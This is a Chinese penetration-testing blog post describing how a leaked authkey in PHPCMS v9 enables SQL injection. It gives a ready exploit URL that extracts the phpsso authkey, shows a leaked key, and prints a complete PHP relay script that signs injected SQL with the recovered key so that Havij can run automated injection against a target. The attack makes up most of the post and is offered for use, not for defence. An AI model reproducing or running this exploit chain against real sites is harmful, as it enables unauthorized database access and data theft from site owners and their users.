phpcmsv9 authkey泄露导致SQL注入漏洞

CracerCracer 2016-4-15 渗透测试 10,290 2 26

输入exp 测试网站有无authkey 泄露

 

http://www.cracer.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V

无标题

 

phpsso_auth_key: 0tagvqnxuq1x8x4jvaziib7yx4e9ibnl

使用中转的脚本对phpcms authkey 进行注入。

 

<--?php
/**
*
* Date: 2016/3/17
* Name: phpcmsv9_authkey_sql.php
* Cracer博客:http://www.cracer.com/
*/
set_time_limit(0);
$wang_url = 'http://localhost/phpcmsv9'; //请修改这里为phpcmsv9网站地址
$auth_key = 'H9zUDnCVcNUvuk9EHIANYHfRvC2W5kAF'; //这里为phpcmsv9 authkey
$str = "uid=1" . stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
$key_length = 4;
$key = md5($key);
$fixedkey = hash('md5', $key);
$egiskeys = md5(substr($fixedkey, 16, 16));
$runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
$keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
$i = 0;
$result = '';
$string_length = strlen($string);
for ($i = 0; $i < $string_length; $i++) {
$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
}
if ($operation == 'ENCODE') {
return $runtokey . str_replace('=', '', base64_encode($result));
} else {
if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
}
}
?-->

使用的办法就是填写目标的www还有key。然后丢到havij里面跑就好了

需要本地搭建php环境运行该构造页面

http://127.0.0.1/phpv9.php?id=1      //此为构造的注入点,其中 phpv9.php是你中转脚本保存名称

 

转载请注明来自Cracer,本文标题:《phpcmsv9 authkey泄露导致SQL注入漏洞》

喜欢 (26) 发布评论
2 条回复
加载中...
  1. 轩轩 10个月前 (05-23)
    沙发

    😛 😛 😛 换友联吗? 😆 😆 😆

    • Cracer
      Cracer 10个月前 (05-25)

      可以

发表评论


Top